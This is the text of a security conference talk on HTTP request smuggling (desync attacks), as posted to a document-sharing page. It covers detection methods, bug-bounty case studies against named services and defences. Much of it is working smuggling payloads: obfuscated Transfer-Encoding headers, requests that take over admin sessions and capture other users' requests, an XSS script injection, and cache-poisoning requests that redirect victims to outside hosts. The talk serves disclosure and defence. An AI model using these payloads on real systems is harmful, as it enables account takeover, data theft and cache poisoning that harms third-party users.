Scribd
Upload
5 views

http-desync-attacks-slides

The document discusses HTTP Request Smuggling and its associated risks, detailing various methodologies for exploiting vulnerabilities through desynchronization techniques. It includes case studies demonstrating real-world attacks and their implications, as well as defensive strategies to mitigate such threats. The presentation emphasizes the importance of proper HTTP/1.1 parsing and the need for robust security measures in web applications.

Uploaded by

Suga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5 views

http-desync-attacks-slides

The document discusses HTTP Request Smuggling and its associated risks, detailing various methodologies for exploiting vulnerabilities through desynchronization techniques. It includes case studies demonstrating real-world attacks and their implications, as well as defensive strategies to mitigate such threats. The presentation emphasizes the importance of proper HTTP/1.1 parsing and the need for robust security measures in web applications.

Uploaded by

Suga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 32

HTTP DESYNC ATTACKS

SMASHING INTO THE CELL NEXT DOOR

James Kettle
The Fear Theory

Q) What topic am I really scared of?


A) HTTP Request Smuggling
Hiding Wookiees in HTTP

First documented by Watchfire in 2005


"You will not earn bounties"
"You will certainly not be considered like a white hat"
Outline

• Theory & Methodology


• Exploitation Case Studies
• Defence
• Q&A
HTTP/1.1 keep-alive

HTTP over TLS/TCP


HTTP/1.1 keep-alive, desynchronized
Desynchronizing: the classic approach

POST / HTTP/1.1
Host: example.com
Front-end sees this Content-Length: 6
Content-Length: 5 Back-end sees this

12345GPOST / HTTP/1.1
Host: example.com
… Unknown method GPOST
Desynchronizing: the chunked approach

POST / HTTP/1.1
Host: example.com
Front-end sees this Content-Length: 6
Transfer-Encoding: chunked Back-end sees this

0
GPOST / HTTP/1.1
… Unknown method GPOST
Desynchronizing: the TE.CL approach

POST / HTTP/1.1
Host: example.com
Content-Length: 3 Back-end sees this
Front-end sees this Transfer-Encoding: chunked

6\r\n
PREFIX
0
POST / HTTP/1.1
Host: example.com
Forcing desync
If a message is received with both a Transfer-Encoding header field and a Content-
Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3
Transfer-Encoding: chunked Transfer-Encoding: chunked
Content-Length: 123 Transfer-Encoding: x

Transfer-Encoding : chunked

Transfer-Encoding: xchunked Transfer-Encoding:[tab]chunked

GET / HTTP/1.1
Transfer-Encoding: chunked

Transfer-Encoding X: X[\n]Transfer-Encoding: chunked


: chunked
Methodology
Detecting desync
POST /about HTTP/1.1 POST /about HTTP/1.1
Host: example.com Host: example.com
Transfer-Encoding: chunked Transfer-Encoding: chunked
Content-Length: 6 Content-Length: 6
3 0
abc
X
Q
CL.CL: backend response CL.CL: backend response
TE.TE: frontend response TE.TE: backend response
TE.CL: frontend response TE.CL: timeout
CL.TE: timeout CL.TE: socket poison
Confirming desync
POST /search HTTP/1.1 POST /search HTTP/1.1
Content-Length: 51 Content-Length: 4
Transfer-Encoding: zchunked Transfer-Encoding: zchunked
11 96
=x&q=smuggling&x= GET /404 HTTP/1.1
0 X: X=1&q=smugging&x=
Host: example.com
GET /404 HTTP/1.1 Content-Length: 100
X: XPOST /search HTTP/1.1
Host: example.com x=
… 0
POST /search HTTP/1.1
Triggers 404 if vulnerable Host: example.com
CASE STUDIES
Bypassing rules

POST / HTTP/1.1
Host: software-vendor.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: software-vendor.com
X: X GET / HTTP/1.1 HTTP/1.1 200 OK
Host: software-vendor.com
Please log in
Bypassing rewrites

POST / HTTP/1.1
Host: security-vendor.com
X-Forwarded-For: 127.0.0.1
Content-Length: 200
Transfer-Encoding : chunked
0
GET / HTTP/1.1
Host: security-vendor.com
X-Forwarded-For: 127.0.0.1
xyz.burpcollaborator.net
X: X GET…
$300
Request reflection
Please ensure that your email and
POST / HTTP/1.1
password are correct.
Host: login.newrelic.com <input id="email" value="asdfPOST
Content-Length: 142 /login HTTP/1.1
Transfer-Encoding: chunked Host: login.newrelic.com
Transfer-Encoding: x X-Forwarded-For: 81.139.39.150
X-Forwarded-Proto: https
0 X-TLS-Bits: 128
X-TLS-Cipher: ECDHE-RSA-AES128…
POST /login HTTP/1.1 x-nr-external-service: external
Host: login.newrelic.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

login[pass]=1234&login[email]=asdf POST /login HTTP/1.1
Host: login.newrelic.com
Exploring
GET / HTTP/1.1 HTTP/1.1 301 Moved Permanently
Host: staging-alerts.newrelic.com Location: https://staging-alerts.newrelic.com/

GET / HTTP/1.1 HTTP/1.1 404 Not Found


Host: staging-alerts.newrelic.com
X-Forwarded-Proto: https Action Controller: Exception caught

GET /revision_check HTTP/1.1 HTTP/1.1 200 OK


Host: staging-alerts.newrelic.com
X-Forwarded-Proto: https Not authorized with header:

GET /revision_check HTTP/1.1 HTTP/1.1 403 Forbidden


Host: staging-alerts.newrelic.com
X-Forwarded-Proto: https Forbidden
X-nr-external-service: 1
Exploring
POST /login HTTP/1.1 HTTP/1.1 200 OK
Host: login.newrelic.com
Content-Length: 564 {
Transfer-Encoding: chunked "user": {
Transfer-encoding: cow "account_id": 934454,
"is_newrelic_admin": true
0 },
"current_account_id": 934454
POST /internal_api/934454/session HTTP/1.1 …
Host: alerts.newrelic.com }
X-Forwarded-Proto: https
Service-Gateway-Account-Id: 934454
Service-Gateway-Is-Newrelic-Admin: true
Content-Length: 6

x=123GET… +$3,000
=$3,300
Involuntary request storage
POST /1/cards HTTP/1.1
Host: trello.com
Transfer-Encoding:[tab]chunked
Content-Length: 4

9f
PUT /1/members/1234 HTTP/1.1
Host: trello.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 400

x=x&csrf=1234&username=testzzz&bio=cake
0
GET / HTTP/1.1 +$1,800
Host: trello.com +$2,500
=$7,600
Harmful responses
POST / HTTP/1.1 HTTP/1.1 200 OK
Host: saas-app.com …
Content-Length: 4 <input name="SAML"
Transfer-Encoding : chunked value="a"><script>alert(1)
10 </script>
=x&csrf=token&x=
66 0
POST /index.php HTTP/1.1
Host: saas-app.com POST / HTTP/1.1
Content-Length: 100 Host: saas-app.com
Cookie: …
SAML=a"><script>alert(1)</script> "/>
0 POST / HTTP/1.1
Host: saas-app.com
+$2,000
Cookie: …
=$9,600
Accidental Cache Poisoning

POST / HTTP/1.1 Frontend perspective


Host: redacted.com
Content-Length: 45
Transfer-Encoding: chunked GET /images/x.png HTTP/1.1

0 HTTP/1.1 301 Moved Permanently


POST / HTTP/1.1 Location: https://52.16.21.24/
Host: 52.16.21.24
X: X GET /images/x.png HTTP/1.1
Web Cache Deception++
POST / HTTP/1.1 Front-end perspective
Transfer-Encoding: blah
GET /static/site.js HTTP/1.1
0
HTTP/1.1 200 OK
GET /user/apikey HTTP/1.1
X: X GET /static/site.js HTTP/1.1
Your API key
Cookie: sessionid=xyz …

Expected habitat:
Sensitive responses with fixed, uncached extensions
Sensitive POST responses
CDN Chaining

POST /cow.jpg HTTP/1.1


Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: www.redhat.com
X: X GET…

Red Hat - We make open source technologies for the enterprise


Chaining DOM Problems

GET /assets/idx?redir=//[email protected]/ HTTP/1.1


Runs on unknown Host: www.redhat.com
URL in victim's
browser <script>
var destination = getQueryParam('redir')
[low quality filtering]
document.location = destination
</script>

POST /en/search?dest=../assets/idx?redir=… HTTP/1.1


Solution: chain a Host: www.redhat.com
server-side local
redirect HTTP/1.1 301 Found
Location: /assets/idx?redir=//redhat.co…
Redirects with teeth

POST /etc/libs/xyz.js HTTP/1.1


Host: redacted.com
Content-Length: 57
Transfer-Encoding: chunked
0
POST /etc HTTP/1.1
Host: burpcollaborator.net +$550
X: X GET /etc/libs/xyz.js HTTP/1.1 +$750
… +$1,000
+$2,000
HTTP/1.1 301 Moved Permanently +$5,000
Location: https://burpcollaborator.net/etc/ +$10,500
=$27,400
Web Cache Poisoning
POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1
Host: c.paypal.com
Content-Length: 61
Transfer-Encoding: chunked
0
GET /webstatic HTTP/1.1
Host: skeletonscribe.net?
X: X GET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1
Host: c.paypal.com
Connection: close

HTTP/1.1 302 Found


Location: http://skeletonscribe.net ?, c.paypal.com/webstatic/
PayPal Poisoning

+$18,900
=$46,300
Wrapped exploits

GET / HTTP/1.1 HTTP/1.1 403 Forbidden


Host: c.paypal.com Server: AkamaiGHost
Content-Length: 5
Transfer-Encoding: chunked <HTML><HEAD>
<TITLE>Access Denied</TITLE>
0 </HEAD>

GET / HTTP/1.1
Host: c.paypal.com HTTP/1.1 200 OK
Content-Length: 5 …
Transfer-Encoding:
chunked
0 +$20,000
=$66,300
DEMO

-bugzilla-

+$4,500
=$70,800
Defence

Attack Tooling
• Support manual/invalid content-length
• Don't normalize requests
• Test environment must match prod
Safety
• Frontend: Normalize ambiguous requests – RFC 7230
• Frontend: Use HTTP/2 to talk to backend
• Backend: Drop request & connection
Further reading
Whitepaper
https://portswigger.net/blog/http-desync-attacks
Online labs
https://portswigger.net/web-security/request-smuggling
Burp Suite Extension
https://github.com/portswigger/http-request-smuggler
References
http://cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
DEF CON 24 – regilero - Hiding Wookiees in HTTP
Takeaways

• HTTP Request Smuggling is real


• HTTP/1.1 parsing is security critical
• Detection doesn't have to be dangerous

@albinowax
Email: [email protected]

You might also like